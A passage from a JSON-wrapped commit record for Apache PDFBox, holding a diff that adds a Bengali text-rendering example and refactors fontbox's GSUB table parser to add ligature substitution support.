https://svn.apache.org/repos/asf/pdfbox/trunk@1829710 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "new file mode 100644", + "index 000000000..221549918", + "--- /dev/null", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -0,0 +1,115 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.pdfbox.examples.pdmodel;", + "+", + "+import java.io.IOException;", + "+import java.net.URISyntaxException;", + "+", + "+import org.apache.pdfbox.pdmodel.PDDocument;", + "+import org.apache.pdfbox.pdmodel.PDPage;", + "+import org.apache.pdfbox.pdmodel.PDPageContentStream;", + "+import org.apache.pdfbox.pdmodel.font.PDFont;", + "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", + "+import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + "+", + "+/**", + "+ * Inspired from PdfBox", + "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", + "+ * supported. First, we render some text, and then embed an image with the correct text displayed on", + "+ * the next page.", + "+ *", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class BengaliPdfGenerationHelloWorld", + "+{", + "+", + "+ /**", + "+ * The unicode of this is given below:", + "+ * ", + "+ *
    ",
    +                "+     * \\u0986\\u09ae\\u09bf  \\u0995\\u09cb\\u09a8 \\u09aa\\u09a5\\u09c7  \\u0995\\u09cd\\u09b7\\u09c0\\u09b0\\u09c7\\u09b0 \\u09b7\\u09a8\\u09cd\\u09a1  \\u09aa\\u09c1\\u09a4\\u09c1\\u09b2 \\u09b0\\u09c1\\u09aa\\u09cb  \\u0997\\u0999\\u09cd\\u0997\\u09be \\u098b\\u09b7\\u09bf",
    +                "+     * 
    ", + "+ * ", + "+ */", + "+ private static final String BANGLA_TEXT_1 = \"\u00e0\u00a6\u0086\u00e0\u00a6\u00ae\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a7\u008b\u00e0\u00a6\u00a8 \u00e0\u00a6\u00aa\u00e0\u00a6\u00a5\u00e0\u00a7\u0087 \u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u0080\u00e0\u00a6\u00b0\u00e0\u00a7\u0087\u00e0\u00a6\u00b0 \u00e0\u00a6\u00b2\u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u008d\u00e0\u00a6\u00ae\u00e0\u00a7\u0080 \u00e0\u00a6\u00b7\u00e0\u00a6\u00a8\u00e0\u00a7\u008d\u00e0\u00a6\u00a1 \u00e0\u00a6\u00aa\u00e0\u00a7\u0081\u00e0\u00a6\u00a4\u00e0\u00a7\u0081\u00e0\u00a6\u00b2 \u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00aa\u00e0\u00a7\u008b \u00e0\u00a6\u0097\u00e0\u00a6\u0099\u00e0\u00a7\u008d\u00e0\u00a6\u0097\u00e0\u00a6\u00be \u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf\";", + "+ private static final String BANGLA_TEXT_2 = \"\u00e0\u00a6\u00a6\u00e0\u00a7\u008d\u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00a4 \u00e0\u00a6\u0097\u00e0\u00a6\u00be\u00e0\u00a6\u00a2\u00e0\u00a6\u00bc \u00e0\u00a6\u00b6\u00e0\u00a7\u0087\u00e0\u00a6\u00af\u00e0\u00a6\u00bc\u00e0\u00a6\u00be\u00e0\u00a6\u00b2 \u00e0\u00a6\u0085\u00e0\u00a6\u00b2\u00e0\u00a6\u00b8 \u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u00b0 \u00e0\u00a6\u009c\u00e0\u00a7\u0081\u00e0\u00a6\u00a1\u00e0\u00a6\u00bc\u00e0\u00a7\u0087 \u00e0\u00a6\u009c\u00e0\u00a6\u00be\u00e0\u00a6\u00ae\u00e0\u00a7\u008d\u00e0\u00a6\u00aa \u00e0\u00a6\u00a7\u00e0\u00a7\u0081\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00a4 \u00e0\u00a6\u00b9\u00e0\u00a6\u00a0\u00e0\u00a6\u00be\u00e0\u00a7\u008e \u00e0\u00a6\u00ad\u00e0\u00a6\u00be\u00e0\u00a6\u0099\u00e0\u00a7\u0087\u00e0\u00a6\u00a8\u00e0\u00a6\u00bf \u00e0\u00a6\u00ae\u00e0\u00a7\u008c\u00e0\u00a6\u00b2\u00e0\u00a6\u00bf\u00e0\u00a6\u0095 \u00e0\u00a6\u0090\u00e0\u00a6\u00b6\u00e0\u00a6\u00bf \u00e0\u00a6\u00a6\u00e0\u00a7\u0088\";", + "+ private static final String BANGLA_TEXT_3 = \"\u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a6\u00b2\u00e0\u00a7\u008d\u00e0\u00a6\u00b2\u00e0\u00a7\u008b\u00e0\u00a6\u00b2 \u00e0\u00a6\u00ac\u00e0\u00a7\u008d\u00e0\u00a6\u00af\u00e0\u00a6\u00be\u00e0\u00a6\u00b8 \u00e0\u00a6\u00a8\u00e0\u00a6\u00bf\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00ad\u00e0\u00a7\u009f \";", + "+", + "+ static", + "+ {", + "+ if (System.getProperty(\"java.version\").startsWith(\"1.8\"))", + "+ {", + "+ System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", + "+ }", + "+ }", + "+", + "+ public static void main(String[] args) throws IOException, URISyntaxException", + "+ {", + "+ if (args.length != 1)", + "+ {", + "+ System.err.println(", + "+ \"usage: \" + BengaliPdfGenerationHelloWorld.class.getName() + \" \");", + "+ System.exit(1);", + "+ }", + "+", + "+ String filename = args[0];", + "+", + "+ System.out.println(\"The generated pdf filename is: \" + filename);", + "+", + "+ PDDocument doc = new PDDocument();", + "+ try", + "+ {", + "+", + "+ PDPage page1 = new PDPage();", + "+ doc.addPage(page1);", + "+", + "+ PDFont font = PDType0Font.load(doc, BengaliPdfGenerationHelloWorld.class", + "+ .getResourceAsStream(\"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\"),", + "+ true);", + "+", + "+ PDPageContentStream contents = new PDPageContentStream(doc, page1);", + "+ contents.beginText();", + "+ contents.setFont(font, 12);", + "+ contents.newLineAtOffset(10, 750);", + "+ contents.showText(BANGLA_TEXT_1);", + "+ contents.newLineAtOffset(0, -50);", + "+ contents.showText(BANGLA_TEXT_2);", + "+ contents.newLineAtOffset(0, -30);", + "+ contents.showText(BANGLA_TEXT_3);", + "+ contents.endText();", + "+", + "+ PDImageXObject pdImage = PDImageXObject", + "+ .createFromFile(BengaliPdfGenerationHelloWorld.class", + "+ .getResource(", + "+ \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", + "+ // getFile() doesn't work if there is a space in the path", + "+ .toURI().getPath(), doc);", + "+ contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", + "+ contents.close();", + "+", + "+ doc.save(filename);", + "+ }", + "+ finally", + "+ {", + "+ doc.close();", + "+ }", + "+ }", + "+", + "+}", + "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", + "new file mode 100644", + "index 000000000..b5aadd116", + "Binary files /dev/null and b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png differ", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "index 2b5de0109..1986d0dbd 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "@@ -21,3 +21,2 @@ import java.io.IOException;", + " import java.util.ArrayList;", + "-import java.util.Arrays;", + " import java.util.Collection;", + "@@ -33,2 +32,22 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.gsub.GlyphSubstitutionDataExtractor;", + "+import org.apache.fontbox.ttf.table.common.CoverageTable;", + "+import org.apache.fontbox.ttf.table.common.CoverageTableFormat1;", + "+import org.apache.fontbox.ttf.table.common.CoverageTableFormat2;", + "+import org.apache.fontbox.ttf.table.common.FeatureListTable;", + "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", + "+import org.apache.fontbox.ttf.table.common.FeatureTable;", + "+import org.apache.fontbox.ttf.table.common.LangSysRecord;", + "+import org.apache.fontbox.ttf.table.common.LangSysTable;", + "+import org.apache.fontbox.ttf.table.common.LookupListTable;", + "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", + "+import org.apache.fontbox.ttf.table.common.LookupTable;", + "+import org.apache.fontbox.ttf.table.common.RangeRecord;", + "+import org.apache.fontbox.ttf.table.common.ScriptRecord;", + "+import org.apache.fontbox.ttf.table.common.ScriptTable;", + "+import org.apache.fontbox.ttf.table.gsub.LigatureSetTable;", + "+import org.apache.fontbox.ttf.table.gsub.LigatureTable;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeLigatureSubstitutionSubstFormat1;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat1;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat2;", + "@@ -45,6 +64,6 @@ public class GlyphSubstitutionTable extends TTFTable", + "- private LinkedHashMap scriptList;", + "+ private Map scriptList;", + " // featureList and lookupList are not maps because we need to index into them", + "- private FeatureRecord[] featureList;", + "- private LookupTable[] lookupList;", + "+ private FeatureListTable featureListTable;", + "+ private LookupListTable lookupListTable;", + "@@ -55,2 +74,4 @@ public class GlyphSubstitutionTable extends TTFTable", + "+ private Map, Integer>> rawGSubData;", + "+", + " GlyphSubstitutionTable(TrueTypeFont font)", + "@@ -79,7 +100,14 @@ public class GlyphSubstitutionTable extends TTFTable", + " scriptList = readScriptList(data, start + scriptListOffset);", + "- featureList = readFeatureList(data, start + featureListOffset);", + "- lookupList = readLookupList(data, start + lookupListOffset);", + "+ featureListTable = readFeatureList(data, start + featureListOffset);", + "+ lookupListTable = readLookupList(data, start + lookupListOffset);", + "+", + "+ GlyphSubstitutionDataExtractor glyphSubstitutionDataExtractor = new GlyphSubstitutionDataExtractor();", + "+", + "+ rawGSubData = glyphSubstitutionDataExtractor", + "+ .getGsubData(scriptList, featureListTable, lookupListTable);", + "+ LOG.debug(\"rawGSubData: \" + rawGSubData);", + " }", + "- LinkedHashMap readScriptList(TTFDataStream data, long offset) throws IOException", + "+ private Map readScriptList(TTFDataStream data, long offset)", + "+ throws IOException", + " {", + "@@ -87,10 +115,9 @@ public class GlyphSubstitutionTable extends TTFTable", + " int scriptCount = data.readUnsignedShort();", + "- ScriptRecord[] scriptRecords = new ScriptRecord[scriptCount];", + "+ ScriptTable[] scriptTables= new ScriptTable[scriptCount];", + " int[] scriptOffsets = new int[scriptCount];", + "+ String[] scriptTags = new String[scriptCount];", + " for (int i = 0; i < scriptCount; i++)", + " {", + "- ScriptRecord scriptRecord = new ScriptRecord();", + "- scriptRecord.scriptTag = data.readString(4);", + "+ scriptTags[i] = data.readString(4);", + " scriptOffsets[i] = data.readUnsignedShort();", + "- scriptRecords[i] = scriptRecord;", + " }", + "@@ -98,16 +125,16 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- scriptRecords[i].scriptTable = readScriptTable(data, offset + scriptOffsets[i]);", + "+ scriptTables[i] = readScriptTable(data, offset + scriptOffsets[i]);", + " }", + "- LinkedHashMap resultScriptList = new LinkedHashMap<>(scriptCount);", + "- for (ScriptRecord scriptRecord : scriptRecords)", + "+ Map resultScriptList = new LinkedHashMap<>(scriptCount);", + "+ for (int i = 0; i < scriptCount; i++)", + " {", + "- resultScriptList.put(scriptRecord.scriptTag, scriptRecord.scriptTable);", + "+ ScriptRecord scriptRecord = new ScriptRecord(scriptTags[i], scriptTables[i]);", + "+ resultScriptList.put(scriptRecord.getScriptTag(), scriptRecord.getScriptTable());", + " }", + "- return resultScriptList;", + "+ return Collections.unmodifiableMap(resultScriptList);", + " }", + "- ScriptTable readScriptTable(TTFDataStream data, long offset) throws IOException", + "+ private ScriptTable readScriptTable(TTFDataStream data, long offset) throws IOException", + " {", + " data.seek(offset);", + "- ScriptTable scriptTable = new ScriptTable();", + " int defaultLangSys = data.readUnsignedShort();", + "@@ -115,2 +142,3 @@ public class GlyphSubstitutionTable extends TTFTable", + " LangSysRecord[] langSysRecords = new LangSysRecord[langSysCount];", + "+ String[] langSysTags = new String[langSysCount];", + " int[] langSysOffsets = new int[langSysCount];", + "@@ -118,10 +146,11 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- LangSysRecord langSysRecord = new LangSysRecord();", + "- langSysRecord.langSysTag = data.readString(4);", + "+ langSysTags[i] = data.readString(4);", + " langSysOffsets[i] = data.readUnsignedShort();", + "- langSysRecords[i] = langSysRecord;", + " }", + "+", + "+ LangSysTable defaultLangSysTable = null;", + "+", + " if (defaultLangSys != 0)", + " {", + "- scriptTable.defaultLangSysTable = readLangSysTable(data, offset + defaultLangSys);", + "+ defaultLangSysTable = readLangSysTable(data, offset + defaultLangSys);", + " }", + "@@ -129,29 +158,30 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- langSysRecords[i].langSysTable = readLangSysTable(data, offset + langSysOffsets[i]);", + "+ LangSysTable langSysTable = readLangSysTable(data, offset + langSysOffsets[i]);", + "+ langSysRecords[i] = new LangSysRecord(langSysTags[i], langSysTable);", + " }", + "- scriptTable.langSysTables = new LinkedHashMap<>(langSysCount);", + "+ Map langSysTables = new LinkedHashMap<>(langSysCount);", + " for (LangSysRecord langSysRecord : langSysRecords)", + " {", + "- scriptTable.langSysTables.put(langSysRecord.langSysTag, langSysRecord.langSysTable);", + "+ langSysTables.put(langSysRecord.getLangSysTag(),", + "+ langSysRecord.getLangSysTable());", + " }", + "- return scriptTable;", + "+ return new ScriptTable(defaultLangSysTable, Collections.unmodifiableMap(langSysTables));", + " }", + "- LangSysTable readLangSysTable(TTFDataStream data, long offset) throws IOException", + "+ private LangSysTable readLangSysTable(TTFDataStream data, long offset) throws IOException", + " {", + " data.seek(offset);", + "- LangSysTable langSysTable = new LangSysTable();", + "- @SuppressWarnings({\"unused\", \"squid:S1854\"})", + " int lookupOrder = data.readUnsignedShort();", + "- langSysTable.requiredFeatureIndex = data.readUnsignedShort();", + "+ int requiredFeatureIndex = data.readUnsignedShort();", + " int featureIndexCount = data.readUnsignedShort();", + "- langSysTable.featureIndices = new int[featureIndexCount];", + "+ int[] featureIndices = new int[featureIndexCount];", + " for (int i = 0; i < featureIndexCount; i++)", + " {", + "- langSysTable.featureIndices[i] = data.readUnsignedShort();", + "+ featureIndices[i] = data.readUnsignedShort();", + " }", + "- return langSysTable;", + "+ return new LangSysTable(lookupOrder, requiredFeatureIndex, featureIndexCount,", + "+ featureIndices);", + " }", + "- FeatureRecord[] readFeatureList(TTFDataStream data, long offset) throws IOException", + "+ private FeatureListTable readFeatureList(TTFDataStream data, long offset) throws IOException", + " {", + "@@ -161,8 +191,7 @@ public class GlyphSubstitutionTable extends TTFTable", + " int[] featureOffsets = new int[featureCount];", + "+ String[] featureTags = new String[featureCount];", + " for (int i = 0; i < featureCount; i++)", + " {", + "- FeatureRecord featureRecord = new FeatureRecord();", + "- featureRecord.featureTag = data.readString(4);", + "+ featureTags[i] = data.readString(4);", + " featureOffsets[i] = data.readUnsignedShort();", + "- featureRecords[i] = featureRecord;", + " }", + "@@ -170,23 +199,22 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- featureRecords[i].featureTable = readFeatureTable(data, offset + featureOffsets[i]);", + "+ FeatureTable featureTable = readFeatureTable(data, offset + featureOffsets[i]);", + "+ featureRecords[i] = new FeatureRecord(featureTags[i], featureTable);", + " }", + "- return featureRecords;", + "+ return new FeatureListTable(featureCount, featureRecords);", + " }", + "- FeatureTable readFeatureTable(TTFDataStream data, long offset) throws IOException", + "+ private FeatureTable readFeatureTable(TTFDataStream data, long offset) throws IOException", + " {", + " data.seek(offset);", + "- FeatureTable featureTable = new FeatureTable();", + "- @SuppressWarnings({\"unused\", \"squid:S1854\"})", + " int featureParams = data.readUnsignedShort();", + " int lookupIndexCount = data.readUnsignedShort();", + "- featureTable.lookupListIndices = new int[lookupIndexCount];", + "+ int[] lookupListIndices = new int[lookupIndexCount];", + " for (int i = 0; i < lookupIndexCount; i++)", + " {", + "- featureTable.lookupListIndices[i] = data.readUnsignedShort();", + "+ lookupListIndices[i] = data.readUnsignedShort();", + " }", + "- return featureTable;", + "+ return new FeatureTable(featureParams, lookupIndexCount, lookupListIndices);", + " }", + "- LookupTable[] readLookupList(TTFDataStream data, long offset) throws IOException", + "+ private LookupListTable readLookupList(TTFDataStream data, long offset) throws IOException", + " {", + "@@ -204,11 +232,10 @@ public class GlyphSubstitutionTable extends TTFTable", + " }", + "- return lookupTables;", + "+ return new LookupListTable(lookupCount, lookupTables);", + " }", + "- LookupTable readLookupTable(TTFDataStream data, long offset) throws IOException", + "+ private LookupTable readLookupTable(TTFDataStream data, long offset) throws IOException", + " {", + " data.seek(offset);", + "- LookupTable lookupTable = new LookupTable();", + "- lookupTable.lookupType = data.readUnsignedShort();", + "- lookupTable.lookupFlag = data.readUnsignedShort();", + "+ int lookupType = data.readUnsignedShort();", + "+ int lookupFlag = data.readUnsignedShort();", + " int subTableCount = data.readUnsignedShort();", + "@@ -219,8 +246,14 @@ public class GlyphSubstitutionTable extends TTFTable", + " }", + "- if ((lookupTable.lookupFlag & 0x0010) != 0)", + "+", + "+ int markFilteringSet;", + "+ if ((lookupFlag & 0x0010) != 0)", + "+ {", + "+ markFilteringSet = data.readUnsignedShort();", + "+ }", + "+ else", + " {", + "- lookupTable.markFilteringSet = data.readUnsignedShort();", + "+ markFilteringSet = 0;", + " }", + "- lookupTable.subTables = new LookupSubTable[subTableCount];", + "- switch (lookupTable.lookupType)", + "+ LookupSubTable[] subTables = new LookupSubTable[subTableCount];", + "+ switch (lookupType)", + " {", + "@@ -229,3 +262,10 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- lookupTable.subTables[i] = readLookupSubTable(data, offset + subTableOffets[i]);", + "+ subTables[i] = readLookupSubTable(data, offset + subTableOffets[i]);", + "+ }", + "+ break;", + "+ case 4: // Ligature Substitution Subtable", + "+ for (int i = 0; i < subTableCount; i++)", + "+ {", + "+ subTables[i] = readLigatureSubstitutionSubtable(data,", + "+ offset + subTableOffets[i]);", + " }", + "@@ -234,8 +274,9 @@ public class GlyphSubstitutionTable extends TTFTable", + " // Other lookup types are not supported", + "- LOG.debug(\"Type \" + lookupTable.lookupType + \" GSUB lookup table is not supported and will be ignored\");", + "+ LOG.debug(\"Type \" + lookupType", + "+ + \" GSUB lookup table is not supported and will be ignored\");", + " }", + "- return lookupTable;", + "+ return new LookupTable(lookupType, lookupFlag, markFilteringSet, subTables);", + " }", + "- LookupSubTable readLookupSubTable(TTFDataStream data, long offset) throws IOException", + "+ private LookupSubTable readLookupSubTable(TTFDataStream data, long offset) throws IOException", + " {", + "@@ -247,8 +288,6 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- LookupTypeSingleSubstFormat1 lookupSubTable = new LookupTypeSingleSubstFormat1();", + "- lookupSubTable.substFormat = substFormat;", + " int coverageOffset = data.readUnsignedShort();", + "- lookupSubTable.deltaGlyphID = data.readSignedShort();", + "- lookupSubTable.coverageTable = readCoverageTable(data, offset + coverageOffset);", + "- return lookupSubTable;", + "+ short deltaGlyphID = data.readSignedShort();", + "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverageOffset);", + "+ return new LookupTypeSingleSubstFormat1(substFormat, coverageTable, deltaGlyphID);", + " }", + "@@ -256,13 +295,11 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- LookupTypeSingleSubstFormat2 lookupSubTable = new LookupTypeSingleSubstFormat2();", + "- lookupSubTable.substFormat = substFormat;", + " int coverageOffset = data.readUnsignedShort();", + " int glyphCount = data.readUnsignedShort();", + "- lookupSubTable.substituteGlyphIDs = new int[glyphCount];", + "+ int[] substituteGlyphIDs = new int[glyphCount];", + " for (int i = 0; i < glyphCount; i++)", + " {", + "- lookupSubTable.substituteGlyphIDs[i] = data.readUnsignedShort();", + "+ substituteGlyphIDs[i] = data.readUnsignedShort();", + " }", + "- lookupSubTable.coverageTable = readCoverageTable(data, offset + coverageOffset);", + "- return lookupSubTable;", + "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverageOffset);", + "+ return new LookupTypeSingleSubstFormat2(substFormat, coverageTable, substituteGlyphIDs);", + " }", + "@@ -273,3 +310,96 @@ public class GlyphSubstitutionTable extends TTFTable", + "- CoverageTable readCoverageTable(TTFDataStream data, long offset) throws IOException", + "+ private LookupSubTable readLigatureSubstitutionSubtable(TTFDataStream data, long offset)", + "+ throws IOException", + "+ {", + "+ data.seek(offset);", + "+ int substFormat = data.readUnsignedShort();", + "+", + "+ if (substFormat != 1)", + "+ {", + "+ throw new IllegalArgumentException(", + "+ \"The expected SubstFormat for LigatureSubstitutionTable is 1\");", + "+ }", + "+", + "+ int coverage = data.readUnsignedShort();", + "+ int ligSetCount = data.readUnsignedShort();", + "+", + "+ int[] ligatureOffsets = new int[ligSetCount];", + "+", + "+ for (int i = 0; i < ligSetCount; i++)", + "+ {", + "+ ligatureOffsets[i] = data.readUnsignedShort();", + "+ }", + "+", + "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverage);", + "+", + "+ if (ligSetCount != coverageTable.getSize())", + "+ {", + "+ throw new IllegalArgumentException(", + "+ \"According to the OpenTypeFont specifications, the coverage count should be equal to the no. of LigatureSetTables\");", + "+ }", + "+", + "+ LigatureSetTable[] ligatureSetTables = new LigatureSetTable[ligSetCount];", + "+", + "+ for (int i = 0; i < ligSetCount; i++)", + "+ {", + "+", + "+ int coverageGlyphId = coverageTable.getGlyphId(i);", + "+", + "+ ligatureSetTables[i] = readLigatureSetTable(data,", + "+ offset + ligatureOffsets[i], coverageGlyphId);", + "+ }", + "+", + "+ return new LookupTypeLigatureSubstitutionSubstFormat1(substFormat, coverageTable,", + "+ ligatureSetTables);", + "+ }", + "+", + "+ private LigatureSetTable readLigatureSetTable(TTFDataStream data, long ligatureSetTableLocation,", + "+ int coverageGlyphId) throws IOException", + "+ {", + "+ data.seek(ligatureSetTableLocation);", + "+", + "+ int ligatureCount = data.readUnsignedShort();", + "+ LOG.debug(\"ligatureCount=\" + ligatureCount);", + "+", + "+ int[] ligatureOffsets = new int[ligatureCount];", + "+ LigatureTable[] ligatureTables = new LigatureTable[ligatureCount];", + "+", + "+ for (int i = 0; i < ligatureOffsets.length; i++)", + "+ {", + "+ ligatureOffsets[i] = data.readUnsignedShort();", + "+ }", + "+", + "+ for (int i = 0; i < ligatureOffsets.length; i++)", + "+ {", + "+ int ligatureOffset = ligatureOffsets[i];", + "+ ligatureTables[i] = readLigatureTable(data,", + "+ ligatureSetTableLocation + ligatureOffset, coverageGlyphId);", + "+ }", + "+", + "+ return new LigatureSetTable(ligatureCount, ligatureTables);", + "+ }", + "+", + "+ private LigatureTable readLigatureTable(TTFDataStream data, long ligatureTableLocation,", + "+ int coverageGlyphId) throws IOException", + "+ {", + "+ data.seek(ligatureTableLocation);", + "+", + "+ int ligatureGlyph = data.readUnsignedShort();", + "+", + "+ int componentCount = data.readUnsignedShort();", + "+", + "+ int[] componentGlyphIDs = new int[componentCount];", + "+", + "+ componentGlyphIDs[0] = coverageGlyphId;", + "+", + "+ for (int i = 1; i <= componentCount - 1; i++)", + "+ {", + "+ componentGlyphIDs[i] = data.readUnsignedShort();", + "+ }", + "+", + "+ return new LigatureTable(ligatureGlyph, componentCount, componentGlyphIDs);", + "+", + "+ }", + "+", + "+ private CoverageTable readCoverageTable(TTFDataStream data, long offset) throws IOException", + " {", + "@@ -281,11 +411,9 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- CoverageTableFormat1 coverageTable = new CoverageTableFormat1();", + "- coverageTable.coverageFormat = coverageFormat;", + " int glyphCount = data.readUnsignedShort();", + "- coverageTable.glyphArray = new int[glyphCount];", + "+ int[] glyphArray = new int[glyphCount];", + " for (int i = 0; i < glyphCount; i++)", + " {", + "- coverageTable.glyphArray[i] = data.readUnsignedShort();", + "+ glyphArray[i] = data.readUnsignedShort();", + " }", + "- return coverageTable;", + "+ return new CoverageTableFormat1(coverageFormat, glyphArray);", + " }", + "@@ -293,12 +421,12 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- CoverageTableFormat2 coverageTable = new CoverageTableFormat2();", + "- coverageTable.coverageFormat = coverageFormat;", + " int rangeCount = data.readUnsignedShort();", + "- coverageTable.rangeRecords = new RangeRecord[rangeCount];", + "+ RangeRecord[] rangeRecords = new RangeRecord[rangeCount];", + "+", + "+", + " for (int i = 0; i < rangeCount; i++)", + " {", + "- coverageTable.rangeRecords[i] = readRangeRecord(data);", + "+ rangeRecords[i] = readRangeRecord(data);", + " }", + "- return coverageTable;", + "+ return new CoverageTableFormat2(coverageFormat, rangeRecords);", + " }", + "@@ -310,6 +438,5 @@ public class GlyphSubstitutionTable extends TTFTable", + "-", + " /**", + "- * Choose from one of the supplied OpenType script tags, depending on what the font supports and", + "- * potentially on context.", + "+ * Choose from one of the supplied OpenType script tags, depending on what the font supports and potentially on", + "+ * context.", + " *", + "@@ -356,5 +483,5 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- if (scriptTable.defaultLangSysTable == null)", + "+ if (scriptTable.getDefaultLangSysTable() == null)", + " {", + "- result = scriptTable.langSysTables.values();", + "+ result = scriptTable.getLangSysTables().values();", + " }", + "@@ -362,4 +489,4 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- result = new ArrayList<>(scriptTable.langSysTables.values());", + "- result.add(scriptTable.defaultLangSysTable);", + "+ result = new ArrayList<>(scriptTable.getLangSysTables().values());", + "+ result.add(scriptTable.getDefaultLangSysTable());", + " }", + "@@ -392,13 +519,14 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- int required = langSysTable.requiredFeatureIndex;", + "+ int required = langSysTable.getRequiredFeatureIndex();", + " if (required != 0xffff) // if no required features = 0xFFFF", + " {", + "- result.add(featureList[required]);", + "+ result.add(featureListTable.getFeatureRecords()[required]);", + " }", + "- for (int featureIndex : langSysTable.featureIndices)", + "+ for (int featureIndex : langSysTable.getFeatureIndices())", + " {", + " if (enabledFeatures == null", + "- || enabledFeatures.contains(featureList[featureIndex].featureTag))", + "+ || enabledFeatures.contains(", + "+ featureListTable.getFeatureRecords()[featureIndex].getFeatureTag()))", + " {", + "- result.add(featureList[featureIndex]);", + "+ result.add(featureListTable.getFeatureRecords()[featureIndex]);", + " }", + "@@ -421,4 +549,4 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- return Integer.compare(enabledFeatures.indexOf(o1.featureTag),", + "- enabledFeatures.indexOf(o2.featureTag));", + "+ return Integer.compare(enabledFeatures.indexOf(o1.getFeatureTag()),", + "+ enabledFeatures.indexOf(o2.getFeatureTag()));", + " }", + "@@ -434,3 +562,3 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- if (featureRecord.featureTag.equals(featureTag))", + "+ if (featureRecord.getFeatureTag().equals(featureTag))", + " {", + "@@ -447,3 +575,3 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- if (iter.next().featureTag.equals(featureTag))", + "+ if (iter.next().getFeatureTag().equals(featureTag))", + " {", + "@@ -457,9 +585,10 @@ public class GlyphSubstitutionTable extends TTFTable", + " int lookupResult = gid;", + "- for (int lookupListIndex : featureRecord.featureTable.lookupListIndices)", + "+ for (int lookupListIndex : featureRecord.getFeatureTable().getLookupListIndices())", + " {", + "- LookupTable lookupTable = lookupList[lookupListIndex];", + "- if (lookupTable.lookupType != 1)", + "+ LookupTable lookupTable = lookupListTable.getLookups()[lookupListIndex];", + "+ if (lookupTable.getLookupType() != 1)", + " {", + "- LOG.debug(\"Skipping GSUB feature '\" + featureRecord.featureTag", + "- + \"' because it requires unsupported lookup table type \" + lookupTable.lookupType);", + "+ LOG.debug(\"Skipping GSUB feature '\" + featureRecord.getFeatureTag()", + "+ + \"' because it requires unsupported lookup table type \"", + "+ + lookupTable.getLookupType());", + " continue;", + "@@ -473,5 +602,5 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- for (LookupSubTable lookupSubtable : 